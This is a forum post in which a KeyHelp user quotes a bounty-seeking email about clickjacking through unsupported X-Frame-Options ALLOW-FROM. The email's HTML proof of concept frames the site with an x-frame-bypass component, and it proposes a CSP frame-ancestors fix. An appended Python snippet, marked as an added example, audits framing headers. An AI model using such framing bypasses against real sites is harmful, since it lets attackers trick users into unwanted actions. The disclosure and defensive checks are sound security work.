Vulnerability Report [X-frame By-Pass]
Posted: Mon 7. Nov 2022, 15:02
Dear KeyHelp friends,
today I received an email that is supposed to point to an alleged security vulnerability in connection with KeyHelp:
What do you think about it?
Best regards,
Hahni
Hello Team,
I have found a bug in your website https://server.de/
The details of it are as follows:
Summary:
X-Frame-Options ALLOW-FROM https://server.de/ is not supported by several browsers.
Steps To Reproduce:
Create a new HTML file
Put <iframe src="https://server.de/" frameborder="0"></iframe>
Save the file
Open document in browser
Impact:
An attacker may trick a user by sending them a malicious link; when the user opens it and clicks some image, their account is unknowingly deactivated.
Solution:
The vulnerability can be fixed by adding "frame-ancestors 'self';" to the CSP (Content-Security-Policy) header.
PoC:
<!DOCTYPE html>
<html>
  <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="X-Frame-Bypass: Web Component extending IFrame to bypass X-Frame-Options: deny/sameorigin">
    <title>X-Frame-Bypass Web Component Demo</title>
    <style>
      html, body {
        margin: 0;
        padding: 0;
        height: 100%;
        overflow: hidden;
      }
      iframe {
        display: block;
        width: calc(70% - 40px);
        height: calc(80% - 40px);
        margin: 20px;
      }
      img {
        position: absolute;
        top: 0;
        right: 0;
      }
    </style>
    <script src="https://unpkg.com/@ungap/custom-elements-builtin"></script>
    <script src="x-frame-bypass.js" type="module"></script>
  </head>
  <body>
    <h1>x-frame-bypass in your site</h1>
    <iframe is="x-frame-bypass" src="https://server.de/"></iframe>
  </body>
</html>
FIX:
Content-Security-Policy: frame-ancestors 'self' is better, because it checks all frame ancestors. You should implement a CSP header to avoid these sorts of attacks. Please let me know if you want more information. I hope that you appreciate my ethical disclosure of this vulnerability; I am expecting a reward as a token of appreciation for this.
Thank you!
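As an added example (not part of the post or the quoted mail), here is a small Python check that judges a response's anti-clickjacking headers the way current browsers enforce them: X-Frame-Options ALLOW-FROM is treated as absent, a CSP frame-ancestors directive takes precedence, and the header the reporter proposes is what it recommends. The header values are constructed samples; server.de is the placeholder host from the mail.

```python
# Added example: audit anti-clickjacking headers as browsers enforce them.
# Models the report's point: ALLOW-FROM is ignored by current browsers, while
# CSP frame-ancestors is checked against every ancestor in the frame chain.
from dataclasses import dataclass, field
from typing import Dict, List, Optional

RECOMMENDED = "Content-Security-Policy: frame-ancestors 'self'"


@dataclass
class FramingVerdict:
    protected: bool            # True if a foreign origin cannot frame the page
    source: str                # header that decided the verdict
    advice: List[str] = field(default_factory=list)


def parse_frame_ancestors(csp: str) -> Optional[List[str]]:
    """Return the frame-ancestors source list (lowercased), or None if absent."""
    for directive in csp.split(";"):
        tokens = directive.strip().split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return [t.lower() for t in tokens[1:]]
    return None


def audit_framing_headers(headers: Dict[str, str]) -> FramingVerdict:
    """Decide whether the response blocks framing by other origins."""
    # Header names are case-insensitive; normalise once.
    h = {k.lower(): v.strip() for k, v in headers.items()}
    ancestors = parse_frame_ancestors(h.get("content-security-policy", ""))
    if ancestors is not None:
        # Per CSP, frame-ancestors overrides X-Frame-Options when both are sent.
        if any(t in ("*", "http:", "https:") for t in ancestors):
            return FramingVerdict(False, "content-security-policy",
                                  ["frame-ancestors allows any origin; use 'self' or an explicit host list"])
        return FramingVerdict(True, "content-security-policy")
    xfo = h.get("x-frame-options", "").upper()
    if xfo in ("DENY", "SAMEORIGIN"):
        return FramingVerdict(True, "x-frame-options",
                              [f"also send {RECOMMENDED} so every ancestor in the frame chain is checked"])
    if xfo.startswith("ALLOW-FROM"):
        return FramingVerdict(False, "x-frame-options",
                              ["ALLOW-FROM is not supported by current browsers and is treated as absent",
                               f"replace it with {RECOMMENDED} (name the trusted origin instead of 'self' if needed)"])
    return FramingVerdict(False, "none", [f"no effective framing protection; send {RECOMMENDED}"])


if __name__ == "__main__":
    # Constructed sample: the header the report describes as unsupported.
    print(audit_framing_headers({"X-Frame-Options": "ALLOW-FROM https://server.de/"}))
```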